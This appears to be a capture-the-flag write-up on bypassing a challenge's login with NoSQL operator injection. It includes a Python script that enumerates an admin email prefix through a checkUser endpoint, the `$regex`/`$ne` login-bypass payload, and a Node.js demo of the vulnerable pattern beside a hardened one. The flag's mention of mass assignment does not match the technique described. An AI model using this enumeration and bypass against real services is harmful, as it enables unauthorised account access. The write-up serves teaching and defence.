To summarize this CTF challenge, it could be solved with a NoSQL injection attack.
The challenge provided a login and registration feature, as well as an endpoint for checking whether an email exists and whether that account has admin privileges.
The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true.
Payload
```python
import string
import requests

# The checkUser endpoint accepts email[$regex]=..., so each request tests
# whether an email starting with the given character belongs to an admin.
url = "http://143.42.131.80:1337/checkUser?email[$regex]=^"


def find_isAdmin_true():
    payload = ""
    # Note: string.printable includes regex metacharacters and characters
    # that are not URL-safe; they are sent unescaped here, as in the write-up.
    for i in string.printable:
        res = requests.get(url=url + i)
        if '{"exists":true,"isAdmin":true}' in res.text:
            payload = url + i
            print("[+] Payload : " + payload)
            break


if __name__ == "__main__":
    find_isAdmin_true()

# Result: http://143.42.131.80:1337/checkUser?email[$regex]=^f
```
To find such an account, I attempted a NoSQL injection attack and used a Python script that iterates over printable characters, sends `email[$regex]=^<char>` to the checkUser endpoint, and stops at the first prefix for which the response reports an existing account with "isAdmin" set to true.
Exploit
email[$regex]=^f&password[$ne]=1
This payload is a query that matches any email starting with the letter "f" and any password that is not 1. The "$regex" operator applies a regular expression, where "^" anchors to the start of the string and "f" is the literal letter; the "$ne" operator means "not equal". Because the server builds its database query directly from the parsed request parameters, the bracketed keys become query operators instead of plain string values.
By selecting every document whose "password" field is not 1, the login query evaluates to true for the admin account, thereby bypassing the login logic.
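As an added illustration (not part of the original write-up), the following Node.js snippet shows how a bracketed query string such as `email[$regex]=^f&password[$ne]=1` turns into a MongoDB-style operator object when a server parses nested parameters and forwards them unchanged, and how a plain type check on the credentials stops it. The bracket parser, the in-memory matcher (a stand-in for a collection's `find()`), and the sample users are all constructed for this demo.

```javascript
// Minimal bracket-syntax parser, modelled on "extended" query parsing:
//   "email[$regex]=^f&password[$ne]=1"
//   -> { email: { $regex: "^f" }, password: { $ne: "1" } }
function parseQueryString(qs) {
  const out = {};
  for (const pair of qs.split("&")) {
    if (!pair) continue;
    const [rawKey, rawVal = ""] = pair.split("=");
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Tiny in-memory stand-in for a collection's find(): supports equality,
// $regex and $ne, which is enough to show why the injected filter matches.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    const v = doc[field];
    if (cond !== null && typeof cond === "object") {
      if ("$regex" in cond && !new RegExp(cond.$regex).test(String(v))) return false;
      if ("$ne" in cond && v === cond.$ne) return false;
      return true;
    }
    return v === cond;
  });
}

// Constructed sample users (not from the challenge).
const USERS = [
  { email: "alice@example.com", password: "hunter2", isAdmin: false },
  { email: "flagadmin@example.com", password: "s3cret", isAdmin: true },
];

// Vulnerable pattern: the parsed parameters go straight into the filter,
// so nested objects become query operators.
function vulnerableLogin(qs) {
  const q = parseQueryString(qs);
  const filter = { email: q.email, password: q.password };
  return USERS.find((u) => matches(u, filter)) || null;
}

// Hardened pattern: credentials must be plain strings. An object (or array)
// is rejected before any filter is built, so no operator can be injected.
function hardenedLogin(qs) {
  const q = parseQueryString(qs);
  if (typeof q.email !== "string" || typeof q.password !== "string") {
    return { error: "email and password must be strings" };
  }
  return USERS.find((u) => u.email === q.email && u.password === q.password) || null;
}

const injected = "email[$regex]=^f&password[$ne]=1";
console.log("vulnerable:", vulnerableLogin(injected)); // admin user returned
console.log("hardened:", hardenedLogin(injected));     // request rejected
```

In a real service the string check belongs in the request validation layer, and the same rule applies to any field that ends up in a database filter: a value that is not the primitive type you expect should be rejected, not passed through.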
FLAG : ictf{m4ss_ass1gnm3nt_1s_d4ng3rou5_93ab21c8}